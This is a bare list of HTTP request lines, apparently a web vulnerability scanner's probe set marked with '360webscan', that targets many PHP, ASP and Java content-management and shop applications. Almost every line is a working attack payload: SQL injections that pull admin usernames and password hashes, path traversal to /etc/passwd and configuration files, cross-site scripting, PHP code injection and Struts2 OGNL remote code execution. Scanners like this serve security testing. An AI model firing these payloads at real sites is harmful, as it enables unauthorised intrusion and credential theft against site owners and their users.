GET /show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
GET /admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
GET /bom.php?dir=.
GET /phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
GET /myly.aspx?username=test'%20and%20@@version%3E0--
GET /go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
POST /?product-gnotify
POST /Index.action
POST /index.action
POST /login.action
GET /
POST /index.php/api/xmlrpc
GET /CVS/Root
GET /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
GET /index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
GET /index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
GET /plugin.php?id=Network114:Network114&ljtype=1%bf%27
GET /group/group.php?id=1%27webscan_draGxn
GET /dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
GET /index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
GET /category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
POST /upload/flow.php?step=update_cart
GET /user.php?act=is_registered&username=%CE%27360webscan%23
GET /do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
GET /do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
GET /zhuti/360webscan'
GET /js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
GET /js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
GET /search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
GET /WEB-INF/web.xml
GET /api.php?action=File&ctrl=download&path=api.php
GET /?/people/360webscan?notification_id-360webscan'
GET /?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
POST /fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
GET /down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admin/manageAPP.php
GET /index.php?m=poster&c=index&a=poster_click&id=1
GET /yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
GET /?/search/ajax/search_result/search_type-all__q-360webscan'
GET /?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
GET /index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
GET /api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
GET /wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
POST /do/s_rpc.php
POST /new2/s_rpc.php
POST /video/s_rpc.php
POST /photo/s_rpc.php
POST /news/s_rpc.php
GET /plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
GET /page/html/?360webscan'.html
GET /Admin/sqlPlatform/operateSql.aspx
GET /respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
GET /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
GET /e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
GET /index.php?ac=search&at=taglist&tagkey=a%2527
GET /wap/index.php?ac=search&at=taglist&tagkey=a%2527
POST /ckeditor/samples/sample_posteddata.php
GET /plus/carbuyaction.php?dopost=return&code=../../tags
POST /?cart-ajaxadd
GET /do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
GET /index.php?ac=order&at=list
GET /ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
GET /ajax.php?act=verify_ecv&ecvsn=360scan%27
GET /include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
POST /m.php?m=User&a=doLogin
GET /api.php?act=1&appname=../../core/html/pages/about.html%00
GET /ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
GET /message.php?act=webscan'
GET /link.php?act=go&url=webscan.cn'
GET /showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
GET /showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
GET /include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
GET /group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
GET /admin_aspcms/_content/_tag/aspcms_tag.asp
GET /admin_aspcms/index.asp
POST /admin_aspcms/_style/aspcms_stylefun.asp?action=edit
GET /do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
GET /index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /resin-doc/viewfile/?file=index.jsp
POST /portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
POST /includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
POST /api/uc_client/control/mail.php
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
GET /api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
GET /api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
GET /api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
GET /index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
POST /subscribe.php?act=dounsubscribe
POST /productbuy/checkout.asp?11_22.html
GET /data/%23data.asp
POST /manage/Config/BackupRestore.aspx
GET /install/index.php.bak?insLockfile=1
GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
POST /?cart-addGoodsToCart.html
POST /install/index.php?step=active
GET /index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
GET /install/index.php?step=1&insLockfile=1
GET /plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
GET /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
GET /plus/ad_js.php?aid=1&nocache=1
POST /admin.php
GET /resume/?key=xxxx%bf%22;alert(360);//
POST /register.php?do=check
GET /about/?module=../robots.txt&fmodule=7
GET /plus/Promotion.asp
GET /besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
GET /index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
GET /admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
POST /index.php?m=announcement&s=admin/notice
GET /item/?c-5,key-1'.html
GET /admin/fileopen.asp?filename=../index.asp
GET /cache/bak_mysql.txt
GET /index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
GET /api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
GET /product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
GET /user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
POST /article_cat.php?id=12
POST /passport-verify.html
GET /user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
GET /ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
GET /statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
POST /inquiry.php?action=inquiry
GET /install/index.php?_m=frontpage&_a=check
POST /api.php?act=get_spec_single&api_version=3.1
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
POST /api.php?act=get_product_detail_info&api_version=3.1
POST /api.php?act=get_products_list&api_version=3.1
POST /?tools-products.html
POST /index.php?case=admin&act=login&admin_dir=admin&site=default
GET /index.php?case=user&act=space&mid=1
GET /?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
GET /ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
GET /index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
GET /index.php?m=Order&a=index
GET /index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
POST /api/search.php?moduleid=5
POST /item.php?act=ajax&do=subject&op=get_membereffect
GET /include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
GET /include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
GET /do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
GET /?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
POST /?case=manage&act=guestadd&manage=archive&guest=1
GET /article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
GET /phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
GET /u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
GET /index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
GET /misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
GET /general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
GET /jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
POST /member.php?act=login&op=forget&rand=U7183
GET /mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
POST /bocadmin/j/uploadify.php
POST /index.php?app=main&func=common&action=upFile&act=upforhtmleditor
POST /lib/upload/upload.php
GET /jcms/setup/publishadmin.jsp
GET /jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
GET /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /index.php?app=user&ac=../../../robots.txt%00
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /index.php?app=/../robots.txt%00
POST /utility/convert/index.php
POST /utility/convert/data/config.inc.php
GET /install/svinfo.php
GET /posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
POST /wap/index.php?mod=login&action=login
GET /wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
POST /cart.php
POST /api.php?act=set_shopex_conf&api_version=5.0
GET /report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
POST /user.php?act=signin
GET /CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
GET /admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
GET /Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
GET /ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
GET /DownloadShow.asp
GET /NewsClass.asp
GET /plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
GET /index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
GET /Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
GET /temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
POST /api.php?act=search_dly_type&api_version=1.0
GET /api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
GET /?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
GET /aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
POST /lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /index.php?m=message&s=inquiry_basket
GET /index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
GET /index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
GET /index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
GET /index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
GET /index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
GET /notes.php?action=view&nid=1-websec
GET /?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /Search.asp
GET /suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
GET /ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
GET /cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
GET /download.php?tfile=%5C..%5C..%5Cconfig.php
